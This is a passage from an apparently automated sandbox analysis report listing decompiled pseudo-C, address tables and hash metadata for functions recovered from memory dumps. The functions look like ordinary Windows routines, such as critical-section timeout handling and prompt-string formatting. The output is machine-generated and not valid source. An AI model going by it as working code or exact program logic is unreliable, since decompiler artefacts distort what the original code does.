								_t57 =  *_t72 & 0x0000ffff;
								if(_t57 == 0 || _t57 == 0x6d || _t57 == 0x4d) {
									if(_t83 == 0) {
										_t58 = _v36;
										if( *_t58 == 0xc) {
											 *_t58 = 0;
										}
									} else {
										_t85 = _v36;
										_t59 =  *_t85 & 0x0000ffff;
										if(_t59 != 0xc) {
											 *_t85 = _t59 + 0xc;
										}
									}
									goto L29;
								} else {
									L11:
									_t47 = 0;
									goto L32;
								}
							}
							_t68 =  *_t72 & 0x0000ffff;
							if(_v24 >= _t93) {
								_t88 = _v32;
								if(_t68 ==  *((intOrPtr*)(_t88 + 2)) || _t68 ==  *((intOrPtr*)(_t88 + 6))) {
									goto L14;
								} else {
									goto L11;
								}
							}
							if(E4A5518EB(_v32, _t68) != 0) {
								goto L14;
							}
							goto L11;
						} else {
							break;
						}
					}
					L14:
					_v24 = _v24 + 1;
					_t72 = E4A55413B(_t72);
				} while (_v24 < 4);
				_t45 =  *_t72 & 0x0000ffff;
				if(( *_t72 & 0x0000ffff) == 0) {
					goto L29;
				}
				if(E4A5518EB( &_v20, _t45) == 0) {
					goto L11;
				}
				goto L17;
			}





































                                0x4a56c399
                                0x4a56c3a0
                                0x4a56c3aa
                                0x4a56c3b7
                                0x4a56c3b8
                                0x4a56c3b9
                                0x4a56c3bc
                                0x4a56c3c2
                                0x4a56c3c4
                                0x4a56c3c7
                                0x4a56c3ca
                                0x4a56c3cd
                                0x4a56c3ce
                                0x4a56c3ce
                                0x4a56c3d0
                                0x4a56c3d3
                                0x4a56c3d3
                                0x4a56c3d6
                                0x4a56c3d8
                                0x4a56c3e1
                                0x4a56c3e5
                                0x00000000
                                0x4a56c3fe
                                0x4a56c3fe
                                0x4a56c405
                                0x4a56c418
                                0x4a56c421
                                0x4a56c424
                                0x4a56c428
                                0x4a56c42b
                                0x4a56c42e
                                0x4a56c434
                                0x4a56c4f1
                                0x4a56c4f1
                                0x4a56c4f6
                                0x4a56c4fa
                                0x4a56c4ff
                                0x4a56c509
                                0x4a56c50e
                                0x4a56c510
                                0x4a56c510
                                0x4a56c512
                                0x4a56c514
                                0x4a56c514
                                0x4a56c514
                                0x4a56c519
                                0x4a56c51a
                                0x4a56c528
                                0x4a56c528
                                0x4a56c446
                                0x4a56c49e
                                0x4a56c49e
                                0x4a56c4a5
                                0x4a56c4b3
                                0x4a56c4ad
                                0x4a56c4ad
                                0x4a56c4ad
                                0x4a56c4b7
                                0x4a56c4bd
                                0x4a56c4cd
                                0x4a56c4e3
                                0x4a56c4ea
                                0x4a56c4ee
                                0x4a56c4ee
                                0x4a56c4cf
                                0x4a56c4cf
                                0x4a56c4d2
                                0x4a56c4d9
                                0x4a56c4de
                                0x4a56c4de
                                0x4a56c4d9
                                0x00000000
                                0x4a56c45d
                                0x4a56c45d
                                0x4a56c45d
                                0x00000000
                                0x4a56c45d
                                0x4a56c4bd
                                0x4a56c44b
                                0x4a56c44e
                                0x4a56c464
                                0x4a56c46b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56c46b
                                0x4a56c45b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56c405
                                0x4a56c473
                                0x4a56c473
                                0x4a56c480
                                0x4a56c480
                                0x4a56c488
                                0x4a56c48e
                                0x00000000
                                0x00000000
                                0x4a56c49c
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: iswdigit$wcstol
                                • String ID: aApP
                                • API String ID: 644763121-2547155087
                                • Opcode ID: 3faf3271cb64ebef6c4253b4debcd65df9213f3381d03aa07edb5a1d51888909
                                • Instruction ID: 5e48f69067291274f8058100d90ff4cfd1ed2ce508cbbf3cc81b8e5f375c22ba
                                • Opcode Fuzzy Hash: 3faf3271cb64ebef6c4253b4debcd65df9213f3381d03aa07edb5a1d51888909
                                • Instruction Fuzzy Hash: 4751E275A012169BDF04EBA8CA407BE7BB4FF45343F51442AEC4AEB295E734D942C7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022BEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                Download Yara Rule
                                C-Code - Quality: 51%
                                			E022BEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E022ADA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x237793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E022916C0(_t39);
				} else {
					_t40 = E0228F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E022D3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E022901A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x237793c; // 0x0
								_push(_t85);
								_t44 = E02291F28(_t71);
							} else {
								_t44 = E0228F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E022D3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02312306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E022BEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E022D4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E022E3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E022E3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x23720c0;
								if(_t85 != 0x23720c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0231217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E022E3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                0x022bec56
                                0x022bec56
                                0x022bec56
                                0x022bec5c
                                0x022bec64
                                0x022f23e6
                                0x022f23eb
                                0x022f23eb
                                0x022bec6a
                                0x022bec6c
                                0x022bec6f
                                0x022f23f3
                                0x022f23f8
                                0x022f23fa
                                0x022f23fc
                                0x022bec75
                                0x022bec76
                                0x022bec76
                                0x022bec7b
                                0x022bec7c
                                0x022bec7e
                                0x022f2406
                                0x022f2407
                                0x022f240c
                                0x022f240d
                                0x022f240d
                                0x022f240d
                                0x022f2414
                                0x022f2417
                                0x022f241e
                                0x022f2435
                                0x022f2438
                                0x022f243c
                                0x022f243f
                                0x022f2442
                                0x022f2443
                                0x022f2446
                                0x022f2449
                                0x022f2453
                                0x022f2455
                                0x022f245b
                                0x022f245b
                                0x022beb99
                                0x022beb99
                                0x022beb9c
                                0x022beb9d
                                0x022beb9f
                                0x022beba2
                                0x022f2465
                                0x022f246b
                                0x022f246d
                                0x022beba8
                                0x022beba9
                                0x022beba9
                                0x022bebae
                                0x022bebb3
                                0x022bebb9
                                0x022bebbb
                                0x022f2513
                                0x022f2514
                                0x022f2519
                                0x022f251b
                                0x022bec2a
                                0x022bec2d
                                0x022bec33
                                0x022bec36
                                0x022bec3a
                                0x022bec3e
                                0x022bec40
                                0x022bec47
                                0x022bec47
                                0x022bec40
                                0x022922c6
                                0x022bebc1
                                0x022bebc1
                                0x022bebc5
                                0x022bec9a
                                0x022bec9a
                                0x022bebd6
                                0x022bebd6
                                0x00000000
                                0x022bebbb
                                0x022f2477
                                0x022f247c
                                0x022f2486
                                0x022f248b
                                0x022f2496
                                0x022f249b
                                0x022f249d
                                0x022f24a0
                                0x022f24a3
                                0x022f24aa
                                0x022f24aa
                                0x022f24a5
                                0x022f24a5
                                0x022f24a5
                                0x022f24ac
                                0x022f24af
                                0x022f24b0
                                0x022f24b3
                                0x022f24b9
                                0x022f24ba
                                0x022f24bb
                                0x022f24c6
                                0x022f24cb
                                0x022f24cd
                                0x022f24d0
                                0x022f24d1
                                0x022f24d4
                                0x022f24d6
                                0x022f24d9
                                0x022f24d9
                                0x022f24dc
                                0x022f24df
                                0x022f24e1
                                0x022f24e7
                                0x022f24e9
                                0x022f24ec
                                0x022f24ef
                                0x022f24f2
                                0x022f24f2
                                0x022f24ef
                                0x022f24e7
                                0x022f24fa
                                0x022f24ff
                                0x022f2501
                                0x022f2503
                                0x022f2506
                                0x022f250b
                                0x022beb8c
                                0x022beb93
                                0x00000000
                                0x00000000
                                0x022beb93
                                0x00000000
                                0x022beb99
                                0x022bec85
                                0x022bec85
                                0x022bec85
                                0x00000000

                                Strings
                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 022F248D
                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 022F24BD
                                • RTL: Re-Waiting, xrefs: 022F24FA
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                • API String ID: 0-3177188983
                                • Opcode ID: 88be966fa83d253d4d3f03bc82150998271ac7d3219f9f2d90d75881e7ce114d
                                • Instruction ID: c71182cf98c3e202fa3966e7f850f012ebb9a6d1fd6e7da41ce57024b1da4f66
                                • Opcode Fuzzy Hash: 88be966fa83d253d4d3f03bc82150998271ac7d3219f9f2d90d75881e7ce114d
                                • Instruction Fuzzy Hash: 8941E770620305ABDB24EFE4CC84FAA77B9EF45720F108615FA599B2C8D774E941CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55C1E2, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129COMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E4A55C1E2(void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v528;
				signed short* _v532;
				void* __ebx;
				void* __esi;
				signed int _t15;
				signed short* _t19;
				signed short* _t25;
				signed int _t37;
				signed short* _t42;
				signed short _t49;
				signed short _t50;
				signed short* _t56;
				long _t57;
				signed short* _t59;
				signed short* _t63;
				signed int _t66;
				char _t67;

				_t58 = __edi;
				_t15 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t15 ^ _t66;
				_t67 =  *0x4a574081; // 0x0
				_t42 = E4A5522CA( *((intOrPtr*)(_a4 + 0x3c)), E4A553AFC, (0 | _t67 != 0x00000000) + 2);
				_v532 = _t42;
				if( *0x4a574081 != 0) {
					_t63 = _t42;
					if( *_t42 != 0) {
						_push(__edi);
						while(1) {
							L11:
							_t37 =  *_t42 & 0x0000ffff;
							 *_t63 = _t37;
							if(_t37 != 0) {
								break;
							}
							_t42 =  &(_t42[1]);
							while(1) {
								_t9 = _t63 - 2; // -4
								_t59 = _t9;
								if(iswspace( *_t59 & 0x0000ffff) == 0) {
									break;
								}
								_t63 = _t59;
							}
							 *_t63 = 0;
							_t63 =  &(_t63[1]);
							if( *_t42 != 0) {
								continue;
							}
							_t42 = _v532;
							_pop(_t58);
							goto L2;
						}
						_t42 =  &(_t42[1]);
						_t63 =  &(_t63[1]);
						goto L11;
					}
					L2:
					 *_t63 = 0;
				}
				_t19 = _t42;
				_t7 =  &(_t19[1]); // 0x2
				_t56 = _t7;
				do {
					_t49 =  *_t19;
					_t19 =  &(_t19[1]);
				} while (_t49 != 0);
				E4A55185A(_t42, (_t19 - _t56 >> 1) + 1, E4A552598(_t49, _t42));
				_t57 =  *_t42 & 0x0000ffff;
				if(_t57 != 0) {
					_t25 = _t42;
					_t11 =  &(_t25[1]); // 0x2
					_t62 = _t11;
					do {
						_t50 =  *_t25;
						_t25 =  &(_t25[1]);
					} while (_t50 != 0);
					_t28 = _t25 - _t62 >> 1;
					if(_t25 - _t62 >> 1 == 2) {
						if(_t42[1] != 0x3a) {
							goto L20;
						} else {
							_t28 = iswalpha(_t57);
							_pop(_t50);
							if(_t28 == 0) {
								goto L20;
							} else {
								E4A552C56(_t42, _t57, _t58,  &_v528, 0x104,  *_t42 & 0x0000ffff);
								_push( &_v528);
								goto L7;
							}
						}
					} else {
						L20:
						 *0x4a574188 = E4A560511(_t28, _t50, _t58, _t42);
					}
				} else {
					_t62 = 0x4a575260;
					E4A552C56(_t42, _t57, _t58, 0x4a575260, 0x104, 0);
					_push(0x4a575260);
					L7:
					_push(L"%s\r\n");
					E4A5558F3();
					 *0x4a574188 =  *0x4a574188 & 0x00000000;
				}
				return E4A5513A9(0, _t42, _v8 ^ _t66, _t57, _t58, _t62);
			}





















                                0x4a55c1e2
                                0x4a55c1ed
                                0x4a55c1f4
                                0x4a55c1fc
                                0x4a55c21e
                                0x4a55c220
                                0x4a55c226
                                0x4a55c22c
                                0x4a55c22e
                                0x4a56049c
                                0x4a5604a3
                                0x4a5604a3
                                0x4a5604a3
                                0x4a5604a6
                                0x4a5604ac
                                0x00000000
                                0x00000000
                                0x4a5604b5
                                0x4a5604b6
                                0x4a5604b6
                                0x4a5604b6
                                0x4a5604c6
                                0x00000000
                                0x00000000
                                0x4a56049f
                                0x4a56049f
                                0x4a5604ca
                                0x4a5604ce
                                0x4a5604d2
                                0x00000000
                                0x00000000
                                0x4a5604d4
                                0x4a5604da
                                0x00000000
                                0x4a5604da
                                0x4a5604af
                                0x4a5604b1
                                0x00000000
                                0x4a5604b1
                                0x4a55c234
                                0x4a55c236
                                0x4a55c236
                                0x4a55c239
                                0x4a55c23b
                                0x4a55c23b
                                0x4a55c23e
                                0x4a55c23e
                                0x4a55c242
                                0x4a55c243
                                0x4a55c258
                                0x4a55c25d
                                0x4a55c263
                                0x4a5604e0
                                0x4a5604e2
                                0x4a5604e2
                                0x4a5604e5
                                0x4a5604e5
                                0x4a5604e9
                                0x4a5604ea
                                0x4a5604f1
                                0x4a5604f6
                                0x4a56819d
                                0x00000000
                                0x4a5681a3
                                0x4a5681a4
                                0x4a5681aa
                                0x4a5681ad
                                0x00000000
                                0x4a5681b3
                                0x4a5681c3
                                0x4a5681ce
                                0x00000000
                                0x4a5681ce
                                0x4a5681ad
                                0x4a5604fc
                                0x4a5604fc
                                0x4a560502
                                0x4a560502
                                0x4a55c269
                                0x4a55c270
                                0x4a55c276
                                0x4a55c27b
                                0x4a55c27c
                                0x4a55c27c
                                0x4a55c281
                                0x4a55c286
                                0x4a55c28f
                                0x4a55c29e

                                APIs
                                  • Part of subcall function 4A5522CA: iswspace.MSVCRT ref: 4A55238B
                                • iswspace.MSVCRT ref: 4A5604BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: iswspace
                                • String ID: %s$:
                                • API String ID: 2389812497-2429078054
                                • Opcode ID: afc00ccef5836904a5d44ecf80ffb76497e6d138e5044b5b6d62d68742504d6f
                                • Instruction ID: d5fb0d957facc3793a4af0eb8e1d21da5b6a0d447e723f78922904a16141b9d4
                                • Opcode Fuzzy Hash: afc00ccef5836904a5d44ecf80ffb76497e6d138e5044b5b6d62d68742504d6f
                                • Instruction Fuzzy Hash: F3312BB5551212A7E721AF64CA847AA3BFCEF46321F114467E585EF149F7B0C941C350
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55C97C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 119COMMON
                                Download Yara Rule
                                C-Code - Quality: 77%
                                			E4A55C97C(short __eax, void* __edx, short* __edi, short* __esi) {
				short _t70;
				short _t71;
				signed short _t75;
				void* _t77;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t91;
				signed int _t93;
				intOrPtr* _t96;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t105;
				signed int _t112;
				signed short _t115;
				void* _t116;
				void* _t117;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				short* _t126;
				void* _t127;
				void* _t128;
				void* _t136;

				L0:
				while(1) {
					L0:
					_t126 = __esi;
					_t125 = __edi;
					asm("pushad");
					_push(__edx);
					_push(__edi);
					 *(_t127 - 0x24) = __eax;
					_t70 =  *0x4a575262; // 0x0
					 *((short*)(_t127 - 0x22)) = _t70;
					_t71 = 0x5c;
					 *((short*)(_t127 - 0x20)) = _t71;
					 *((short*)(_t127 - 0x1e)) = 0;
					if(GetDriveTypeW(_t127 - 0x24) != 4) {
						goto L19;
					}
					L51:
					__eax = 0;
					 *((short*)(__ebp - 0x20)) = __ax;
					 *((intOrPtr*)(__ebp - 0x284)) = 0x104;
					 *(__ebp - 4) =  *(__ebp - 4) & 0;
					__eax = __ebp - 0x284;
					_push(__ebp - 0x284);
					__eax = __ebp - 0x26c;
					_push(__ebp - 0x26c);
					__eax = __ebp - 0x24;
					_push(__eax);
					L4A5724C5();
					 *((intOrPtr*)(__ebp - 0x27c)) = __eax;
					 *(__ebp - 4) = 0xfffffffe;
					L52:
					if( *((intOrPtr*)(__ebp - 0x27c)) == 0) {
						L57:
						__ebp - 0x26c = E4A55179D(__esi,  *((intOrPtr*)(__ebp - 0x270)), "%s ", __ebp - 0x26c);
						__eax = __esi;
						__edx = __eax + 2;
						while(1) {
							L58:
							__cx =  *__eax;
							__eax = __eax + 1;
							__eax = __eax + 1;
							if(__cx == 0) {
								break;
							}
							L59:
						}
						L38:
						__eax = __eax - __edx;
						L17:
						_t99 = _t98 >> 1;
						L18:
						_t126 = _t126 + _t99 * 2;
						 *((intOrPtr*)(_t127 - 0x270)) =  *((intOrPtr*)(_t127 - 0x270)) - _t99;
						 *((intOrPtr*)(_t127 - 0x274)) = _t126;
						while(1) {
							L19:
							 *(_t127 - 0x278) =  *(_t127 - 0x278) + 2;
							_t112 =  *(_t127 - 0x278);
							_t75 =  *_t112 & 0x0000ffff;
							if(_t75 == 0) {
								break;
							}
							L7:
							if(_t75 != 0x24) {
								L22:
								E4A55179D(_t126,  *((intOrPtr*)(_t127 - 0x270)), 0x4a5745b8, _t75 & 0x0000ffff);
								_t128 = _t128 + 0x10;
								_t82 = _t126;
								_t27 = _t82 + 2; // 0x4a575e42
								_t116 = _t27;
								do {
									L23:
									_t121 =  *_t82;
									_t82 = _t82 + 2;
								} while (_t121 != 0);
								_t85 = _t82 - _t116 >> 1;
								_t126 = _t126 + _t85 * 2;
								 *((intOrPtr*)(_t127 - 0x274)) = _t126;
								 *((intOrPtr*)(_t127 - 0x270)) =  *((intOrPtr*)(_t127 - 0x270)) - _t85;
								if(E4A55661C() == 0 || E4A56EAC4( *_t112 & 0x0000ffff) == 0) {
									 *(_t127 - 0x280) =  *(_t127 - 0x280) & 0x00000000;
								} else {
									 *(_t127 - 0x280) =  *_t112 & 0x0000ffff;
								}
								continue;
							}
							L8:
							 *(_t127 - 0x278) = _t112 + 2;
							_t112 = 0;
							_t136 =  *0x4a574dc0 - _t112; // 0x50
							if(_t136 == 0) {
								L12:
								_t91 = _t112 * 6;
								if( *((short*)(_t91 + 0x4a574dc0)) == 0) {
									break;
								}
								L13:
								_t14 = _t91 + 0x4a574dc2; // 0x45000000
								_t115 =  *_t14 & 0x0000ffff;
								if(_t115 != 8) {
									L1:
									_t93 = (_t115 & 0x0000ffff) - 1;
									if(_t93 > 9) {
										L60:
										E4A55179D(_t126,  *((intOrPtr*)(_t127 - 0x270)), 0x4a5745b8,  *0x4a575260 & 0x0000ffff);
										_t128 = _t128 + 0x10;
										_t96 = _t126;
										_t68 = _t96 + 2; // 0x4a575e42
										_t117 = _t68;
										while(1) {
											L61:
											_t122 =  *_t96;
											_t96 = _t96 + 2;
											if(_t122 == 0) {
												break;
											}
											L62:
										}
										L16:
										_t98 = _t96 - _t117;
										goto L17;
									}
									L2:
									switch( *((intOrPtr*)(_t93 * 4 +  &M4A55CAEA))) {
										case 0:
											L28:
											__eax = E4A55D701(__esi, 0, 1, __esi,  *((intOrPtr*)(__ebp - 0x270)));
											goto L18;
										case 1:
											L29:
											__eax = E4A56270D(0, 1, __esi,  *((intOrPtr*)(__ebp - 0x270)));
											goto L18;
										case 2:
											L3:
											E4A55179D(_t126,  *((intOrPtr*)(_t127 - 0x270)), E4A552CB4, 0x4a575260);
											_t128 = _t128 + 0x10;
											_t101 = _t126;
											_t9 = _t101 + 2; // 0x4a575e42
											_t117 = _t9;
											do {
												L4:
												_t123 =  *_t101;
												_t101 = _t101 + 2;
											} while (_t123 != 0);
											goto L16;
										case 3:
											L30:
											__ebp - 0x64 = E4A55D3B3(__ebp - 0x64, 0x20);
											__eax = __ebp - 0x64;
											__edi = E4A55C56B(__ecx, 0x2350, __ebp - 0x64);
											E4A55179D(__esi,  *((intOrPtr*)(__ebp - 0x270)), E4A552CB4, __edi) = LocalFree(__edi);
											__eax = __esi;
											_t41 = __eax + 2; // 0x4a575e42
											__ecx = _t41;
											while(1) {
												L31:
												__dx =  *__eax;
												__eax = __eax + 1;
												__eax = __eax + 1;
												if(__dx == 0) {
													goto L16;
												}
												L32:
											}
											goto L16;
										case 4:
											L33:
											if( *((short*)(__ebp - 0x280)) == 0) {
												_push(0x4a590758);
											} else {
												_push(0x4a590760);
											}
											L36:
											_push( *((intOrPtr*)(__ebp - 0x270)));
											_push(__esi);
											__eax = E4A55185A();
											__eax = __esi;
											_t44 = __eax + 2; // 0x4a575e42
											__edx = _t44;
											do {
												L37:
												__cx =  *__eax;
												__eax = __eax + 1;
												__eax = __eax + 1;
											} while (__cx != 0);
											goto L38;
										case 5:
											L39:
											__eax = E4A55185A(__esi,  *((intOrPtr*)(__ebp - 0x270)), 0x4a5745a8);
											__eax = __esi;
											_t46 = __eax + 2; // 0x4a575e42
											__ecx = _t46;
											while(1) {
												L40:
												__dx =  *__eax;
												__eax = __eax + 1;
												__eax = __eax + 1;
												if(__dx == 0) {
													goto L16;
												}
												L41:
											}
											goto L16;
										case 6:
											goto L60;
										case 7:
											L42:
											if( *0x4a574081 == 0) {
												goto L19;
											}
											L43:
											__eax = L4A56F169();
											L44:
											__al = __al - 0x28;
											 *__eax =  *__eax + __eax;
											L47:
											while( *((intOrPtr*)(__ebp - 0x270)) > 1) {
												L45:
												__ecx = __eax;
												__eax = __eax - 1;
												if(__ecx == 0) {
													goto L19;
												}
												L46:
												_push(0x2b);
												_pop(__ecx);
												 *__esi = __cx;
												__esi = __esi + 1;
												__esi = __esi + 1;
												 *((intOrPtr*)(__ebp - 0x274)) = __esi;
												 *((intOrPtr*)(__ebp - 0x270)) =  *((intOrPtr*)(__ebp - 0x270)) - 1;
											}
											goto L19;
										case 8:
											L49:
											if( *0x4a574081 == 0) {
												goto L19;
											}
											L50:
											__ax =  *0x4a575260;
											goto L0;
									}
								}
								L14:
								_t15 = _t91 + 0x4a574dc4; // 0x8004500
								E4A55179D(_t126,  *((intOrPtr*)(_t127 - 0x270)), 0x4a5745b8,  *_t15 & 0x0000ffff);
								_t128 = _t128 + 0x10;
								_t105 = _t126;
								_t17 = _t105 + 2; // 0x4a575e42
								_t117 = _t17;
								do {
									L15:
									_t124 =  *_t105;
									_t105 = _t105 + 2;
								} while (_t124 != 0);
								goto L16;
							}
							L9:
							_t125 = 0x4a574dc0;
							L10:
							while(towupper( *( *(_t127 - 0x278)) & 0x0000ffff) !=  *_t125) {
								_t112 = _t112 + 1;
								_t12 = 0x4a574dc0 + _t112 * 6; // 0x4a574dc1
								_t125 = _t12;
								if( *_t125 != 0) {
									continue;
								}
								goto L12;
							}
							goto L12;
						}
						L20:
						 *_t126 = 0;
						_t77 = E4A55C5A0(0x4a575e40);
						if( *0x4a5741b4 != 0) {
							E4A551E6C(_t77);
						}
						return E4A5513CA(_t112, _t125, _t126);
					}
					L53:
					if( *((intOrPtr*)(__ebp - 0x27c)) == 0x8ca) {
						goto L19;
					}
					L54:
					_push(L"Unknown");
					_push( *((intOrPtr*)(__ebp - 0x270)));
					_push(__esi);
					__eax = E4A55179D();
					__esp = __esp + 0xc;
					__eax = __esi;
					__edx = __eax + 2;
					while(1) {
						L55:
						__cx =  *__eax;
						__eax = __eax + 1;
						__eax = __eax + 1;
						if(__cx == 0) {
							goto L38;
						}
						L56:
					}
					goto L38;
				}
			}


























                                0x4a55c97c
                                0x4a55c97c
                                0x4a55c97c
                                0x4a55c97c
                                0x4a55c97c
                                0x4a55c97c
                                0x4a55c97d
                                0x4a55c97e
                                0x4a55c980
                                0x4a55c984
                                0x4a55c98a
                                0x4a55c990
                                0x4a55c991
                                0x4a55c997
                                0x4a55c9a8
                                0x00000000
                                0x00000000
                                0x4a55c9ae
                                0x4a55c9ae
                                0x4a55c9b0
                                0x4a55c9b4
                                0x4a55c9be
                                0x4a55c9c1
                                0x4a55c9c7
                                0x4a55c9c8
                                0x4a55c9ce
                                0x4a55c9cf
                                0x4a55c9d2
                                0x4a55c9d3
                                0x4a55c9d8
                                0x4a55c9de
                                0x4a55ca0e
                                0x4a55ca15
                                0x4a55ca50
                                0x4a55ca63
                                0x4a55ca6b
                                0x4a55ca6d
                                0x4a55ca70
                                0x4a55ca70
                                0x4a55ca70
                                0x4a55ca73
                                0x4a55ca74
                                0x4a55ca78
                                0x00000000
                                0x00000000
                                0x4a55ca7e
                                0x4a55ca7e
                                0x4a55c8fe
                                0x4a55c8fe
                                0x4a55c775
                                0x4a55c775
                                0x4a55c777
                                0x4a55c777
                                0x4a55c77a
                                0x4a55c780
                                0x4a55c786
                                0x4a55c786
                                0x4a55c786
                                0x4a55c78d
                                0x4a55c6d2
                                0x4a55c6d8
                                0x00000000
                                0x00000000
                                0x4a55c6de
                                0x4a55c6e2
                                0x4a55c7ed
                                0x4a55c7fd
                                0x4a55c802
                                0x4a55c805
                                0x4a55c807
